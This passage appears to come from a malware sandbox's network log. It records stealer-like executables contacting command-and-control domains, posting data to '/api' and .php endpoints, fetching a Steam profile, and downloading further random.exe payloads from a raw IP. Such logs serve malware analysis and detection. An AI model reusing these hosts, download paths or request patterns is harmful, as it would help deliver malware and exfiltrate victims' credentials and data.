                        IN A
                        147.45.113.159
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN AAAA
                        Response
                      • flag-ru
                        POST
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        16d019449f.exe
                        Remote address:
                        147.45.113.159:80
                        Request
                        POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                        Host: home.twentytk20pn.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 407045
                      • flag-us
                        DNS
                        bellflamre.click
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        bellflamre.click
                        IN A
                        Response
                      • flag-us
                        DNS
                        immureprech.biz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        immureprech.biz
                        IN A
                        Response
                        immureprech.biz
                        IN A
                        45.77.249.79
                        immureprech.biz
                        IN A
                        104.131.68.180
                        immureprech.biz
                        IN A
                        178.62.201.34
                      • flag-us
                        DNS
                        deafeninggeh.biz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        deafeninggeh.biz
                        IN A
                        Response
                        deafeninggeh.biz
                        IN A
                        45.77.249.79
                        deafeninggeh.biz
                        IN A
                        178.62.201.34
                        deafeninggeh.biz
                        IN A
                        104.131.68.180
                      • flag-us
                        DNS
                        effecterectz.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        effecterectz.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        diffuculttan.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        diffuculttan.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        debonairnukk.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        debonairnukk.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        wrathful-jammy.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        wrathful-jammy.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        awake-weaves.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        awake-weaves.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        sordid-snaked.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sordid-snaked.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        d5ca7bb125.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=84e294bb0b314f49a35904ed; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        POST
                        https://lev-tolstoi.com/api
                        d5ca7bb125.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=svpo6efjjv3c27m5v65iljc08g; expires=Mon, 14 Apr 2025 22:34:09 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6GsIt9wrgxI3EQc9eN09i%2FTbkro1ww96bqlDicbivw9NWTTJu5heIlEwV1NceYDj7BLh2OvT0Y8iyW3Tl91j0qkG1IbC7Uy0XMkvYwaxP13%2BAq7Q3n7qPmcJ3bUyGEwJT8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfea91c7693eb-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49103&min_rtt=47845&rtt_var=15539&sent=6&recv=7&lost=0&retrans=1&sent_bytes=2851&recv_bytes=583&delivery_rate=74297&cwnd=253&unsent_bytes=0&cid=bd20dd412bea0deb&ts=225&x=0"
                      • flag-ru
                        GET
                        http://185.215.113.16/luma/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /luma/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:33 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1880064
                        Last-Modified: Fri, 20 Dec 2024 03:52:53 GMT
                        Connection: keep-alive
                        ETag: "6764ea15-1cb000"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/steam/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /steam/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:42 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2911744
                        Last-Modified: Fri, 20 Dec 2024 03:53:04 GMT
                        Connection: keep-alive
                        ETag: "6764ea20-2c6e00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/well/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /well/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 969216
                        Last-Modified: Fri, 20 Dec 2024 03:50:38 GMT
                        Connection: keep-alive
                        ETag: "6764e98e-eca00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/off/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /off/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:59 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2807808
                        Last-Modified: Fri, 20 Dec 2024 03:51:06 GMT
                        Connection: keep-alive
                        ETag: "6764e9aa-2ad800"
                        Accept-Ranges: bytes
                      • flag-us
                        DNS
                        sweepyribs.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sweepyribs.lat
                        IN A
                        Response
                      • flag-us
                        POST
                        https://discokeyus.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=4vg9fdnifubqm3ircpnhu6ut3k; expires=Mon, 14 Apr 2025 22:34:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5iYe2QereTiHZ7H4DI3yC%2Fi0HsQDkmmTL9b%2F88bS8OKnMLFngaGgtZCUksQr4cIWPNdfsq1rKF3g3L0NqZffrZI4xobD2ge1oROS%2FNqskyCmnDV34y8%2FQht0Qn6pl7lPyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfeedff17f652-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=59024&min_rtt=50510&rtt_var=27112&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=582&delivery_rate=69535&cwnd=253&unsent_bytes=0&cid=7172ce6525e21797&ts=340&x=0"
                      • flag-us
                        POST
                        https://necklacebudi.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=15fkkpqbtq2p5h77t04p9orcsh; expires=Mon, 14 Apr 2025 22:34:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2HNSa%2BckabkaAAhNai7Lv36aMCxkxJuXBaTCZIxsFbgr7q0gV7TX1WPV9LToi0lvRyntfNohGqOhIBO9OJYbrI1Oy8P0HchIBPLqk80J8DaebCMjxmNFIQXCG6Mci1OMlwp"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff033b829457-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=55364&min_rtt=47523&rtt_var=14286&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=584&delivery_rate=71902&cwnd=253&unsent_bytes=0&cid=a6e3089f490183d6&ts=288&x=0"
                      • flag-us
                        POST
                        https://energyaffai.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=l60pn9h3c4qvd4agcagg6rh4e5; expires=Mon, 14 Apr 2025 22:34:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5ml57NHXx%2BR%2FAhFcyiTZ8AFUiUGCATtk1i5T5aueL82X2jsQCUQ9gQIEic4gKZSTGUECAo08fbA%2BPVV4IUJreEZW0Etwirb4l0IFVaXOlkkYfQCWXQj%2BM8HuPTBWWiANW8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff078e529505-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50683&min_rtt=46970&rtt_var=19830&sent=7&recv=8&lost=0&retrans=1&sent_bytes=2931&recv_bytes=583&delivery_rate=41509&cwnd=254&unsent_bytes=0&cid=372cea3bfbe550f3&ts=577&x=0"
                      • flag-ru
                        GET
                        http://185.215.113.206/
                        718410bf88.exe
                        Remote address:
                        185.215.113.206:80
                        Request
                        GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-ru
                        POST
                        http://185.215.113.206/c4becf79229cb002.php
                        718410bf88.exe
                        Remote address:
                        185.215.113.206:80
                        Request
                        POST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-us
                        POST
                        https://aspecteirs.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=66phjrg6t8icimkcupb30n4lm2; expires=Mon, 14 Apr 2025 22:34:25 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pmfUXw7H%2Bt9Azv81V7PMXaYpAsRosD%2BjECIEaAnFd3fUEsg1vqKkWUHFSV617NPQ8uFobvyYQ0vukkINE5UHUPnaRduOH470CgjPE41oCOMpiyQuxoN5JybeRA%2FT1W8zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff09ec8def03-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50962&min_rtt=48444&rtt_var=14174&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=75624&cwnd=253&unsent_bytes=0&cid=70f5778abfcdb6f3&ts=262&x=0"
                      • flag-us
                        POST
                        https://sustainskelet.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=2dj95ric0u5etm2ski0n7jfogn; expires=Mon, 14 Apr 2025 22:34:27 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vl40s7gzwy%2BUWua4GuqC3rH%2BKKuqPwgqFNy4iY%2BgzbYi88BQ9g%2FXUy%2BOjQYTdoidFU%2BlySHnw3JrK7DAgdhrK9n%2BI8FpfptzZks3eAxJswRnhToRpR5siRpuIMqIOGwh9bEfeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff13cf0d951d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53986&min_rtt=52144&rtt_var=17980&sent=9&recv=8&lost=0&retrans=2&sent_bytes=3028&recv_bytes=585&delivery_rate=21992&cwnd=254&unsent_bytes=0&cid=6a5f18997bd2a4f5&ts=2199&x=0"
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN A
                        Response
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN AAAA
                        Response
                        home.twentytk20pn.top
                        IN A
                        147.45.113.159
                      • flag-ru
                        POST
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        16d019449f.exe
                        Remote address:
                        147.45.113.159:80
                        Request
                        POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                        Host: home.twentytk20pn.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 407045
                        Response
                        HTTP/1.0 504 Gateway Time-out
                        Cache-Control: no-cache
                        Connection: close
                        Content-Type: text/html
                      • flag-us
                        POST
                        https://crosshuaht.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=eetneoma5ep37k8nis8s65omv4; expires=Mon, 14 Apr 2025 22:34:30 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHoEPeJ1Sp0fT8j8dLn9l%2B0388cEGTmAEQqkCejx0w3N014mFtQ8Hapgzt8AJQq75sGAxof0TVQg3rsfFc3FfXBuM1%2B1oSzmwO2TuMofMcjGigP%2BNeThRFuTpZ%2F2FZbVuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff2c2f9d7303-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=75174&min_rtt=70072&rtt_var=28889&sent=7&recv=6&lost=0&retrans=1&sent_bytes=2910&recv_bytes=582&delivery_rate=42159&cwnd=249&unsent_bytes=0&cid=0d86328ee927745f&ts=653&x=0"
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN A
                        Response
                        youtube.com
                        IN A
                        172.217.18.206
                      • flag-us
                        DNS
                        spocs.getpocket.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        spocs.getpocket.com
                        IN A
                        Response
                        spocs.getpocket.com
                        IN CNAME
                        prod.ads.prod.webservices.mozgcp.net
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        34.117.188.166
                      • flag-us
                        DNS
                        spocs.getpocket.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        spocs.getpocket.com
                        IN A
                      • flag-us
                        DNS
                        getpocket.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        getpocket.cdn.mozilla.net
                        IN A
                        Response
                        getpocket.cdn.mozilla.net
                        IN CNAME
                        getpocket-cdn.prod.mozaws.net
                        getpocket-cdn.prod.mozaws.net
                        IN CNAME
                        prod.pocket.prod.cloudops.mozgcp.net
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        34.120.5.221
                      • flag-us
                        DNS
                        getpocket.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        getpocket.cdn.mozilla.net
                        IN A
                      • flag-fr
                        GET
                        https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                        firefox.exe
                        Remote address:
                        172.217.18.206:443
                        Request
                        GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                        host: youtube.com
                        user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        accept-language: en-US,en;q=0.5
                        accept-encoding: gzip, deflate, br
                        upgrade-insecure-requests: 1
                        sec-fetch-dest: document
                        sec-fetch-mode: navigate
                        sec-fetch-site: none
                        sec-fetch-user: ?1
                        te: trailers
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN A
                        Response
                        youtube.com
                        IN A
                        172.217.18.206
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN AAAA
                        Response
                        youtube.com
                        IN AAAA
                        2a00:1450:4007:805::200e
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                        34.160.144.191
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                        Response
                        shavar.prod.mozaws.net
                        IN A
                        44.228.225.150
                        shavar.prod.mozaws.net
                        IN A
                        52.40.120.141
                        shavar.prod.mozaws.net
                        IN A
                        44.240.87.158
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                      • flag-us
                        GET
                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                        firefox.exe
                        Remote address:
                        34.120.5.221:443
                        Request
                        GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                        host: getpocket.cdn.mozilla.net
                        user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        accept: */*
                        accept-language: en-US,en;q=0.5
                        accept-encoding: gzip, deflate, br
                        sec-fetch-dest: empty
                        sec-fetch-mode: cors
                        sec-fetch-site: cross-site
                        if-none-match: W/"5388-3ipAD46x0Z0uBmgjCYAJqyMEE1A"
                        te: trailers
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN AAAA
                        2600:1901:0:92a9::
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.149.100.209
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                      • flag-us
                        DNS
                        firefox-settings-attachments.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        firefox-settings-attachments.cdn.mozilla.net
                        IN A
                        Response
                        firefox-settings-attachments.cdn.mozilla.net
                        IN CNAME
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.117.121.53
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
